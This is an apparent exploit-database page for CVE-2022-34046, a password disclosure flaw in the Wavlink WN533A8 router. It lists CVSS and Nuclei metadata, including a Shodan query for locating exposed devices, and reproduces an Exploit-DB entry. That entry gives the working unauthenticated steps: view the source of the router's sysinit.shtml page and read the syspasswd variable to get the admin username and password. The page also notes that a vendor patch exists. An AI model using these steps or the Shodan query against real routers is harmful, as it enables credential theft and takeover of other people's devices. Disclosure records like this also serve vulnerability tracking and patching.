header-logo
Suggest Exploit
vendor:
WN533A8
by:
Ahmed Alroky
7.5
CVSS
HIGH
Password Disclosure
200
CWE
Product Name: WN533A8
Affected Version From: M33A8.V5030.190716
Affected Version To: M33A8.V5030.190716
Patch Exists: YES
Related CWE: CVE-2022-34046
CPE: //a:wavlink:wn533a8
Metasploit:
Other Scripts:
Tags: packetstorm,cve,cve2022,wavlink,router,exposure
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei References: https://drive.google.com/file/d/18ECQEqZ296LDzZ0wErgqnNfen1jCn0mG/view?usp=sharinghttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34046http://packetstormsecurity.com/files/167890/Wavlink-WN533A8-Password-Disclosure.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2022-34046
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.title:"Wi-Fi APP Login"', 'verified': True, 'vendor': 'wavlink', 'product': 'wn533a8_firmware'}
Platforms Tested: Windows
2022

Wavlink WN533A8 – Password Disclosure

The vulnerability allows an attacker to view the username and password of the Wavlink WN533A8 router by accessing the sysinit.shtml page.

Mitigation:

The vendor has released a patch to address the vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Wavlink WN533A8 - Password Disclosure
# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34046
# Tested on: Windows

# Exploit

view-source:http://IP_ADDRESS/sysinit.shtml
search for var syspasswd="
you will find the username and the password

Navigation

Suggest Exploit

Services By CQR